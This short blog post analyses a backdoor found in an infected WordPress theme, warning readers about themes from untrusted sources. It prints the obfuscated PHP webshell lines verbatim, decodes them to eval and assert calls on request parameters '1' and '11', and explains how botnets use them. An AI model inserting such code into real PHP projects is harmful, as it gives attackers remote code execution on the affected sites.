And again a wordpress theme infected with malicious scripts fell into my hands. Moreover, this WordPress theme quite normally lived on the site of one friend until they updated php to the latest version, where the malicious script stopped working, which gave itself away. Unfortunately, the built-in ClamAV antivirus did not detect this script. Other antiviruses detect infected as Trojan.Script.1006652 , Trojan.Script.DF5C3C , PHP.Shell.597 , PHP/WebShell.FX!tr
This backdoor is just a piece of code at the beginning of some theme php files, which in every way tries to encrypt the name of the “assert” function used by php to run arbitrary code. Removing it is not difficult – you just need to cut off the malicious code, but it is more difficult to detect. It looks like this:
<?$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);$_=$_fF("",$_cC);@$_();?><?php $a=substr_replace("axxxert","ss",1,3);$a($_POST['1']);?><?php $a = chr(92+5);$b = chr(ord($a)+18);$c = chr(ord($b)-14);$d = chr(ord($c)+13);$e = chr(ord($d)+2);$f = $a.$b.$b.$c.$d.$e;forward_static_call_array($f, array($_REQUEST['11']));?><?php This is decoded into the following code: eval($_POST['1']); assert($_POST['1']); forward_static_call_array(assert, array($_REQUEST['11']));
Its essence is that it simply waits for a GET or POST request with the parameter “1” or “11” and executes the code that is passed there. That is, in the absence of an external command, the code does not manifest itself in any way and does nothing, but when your site is found by a botnet that regularly sends test commands, it can easily become part of it.
Therefore, it is worth reminding those who like to install WordPress themes from stores or collections of WordPress themes on different sites – this is a very likely way to get an infected site right from the moment it was created.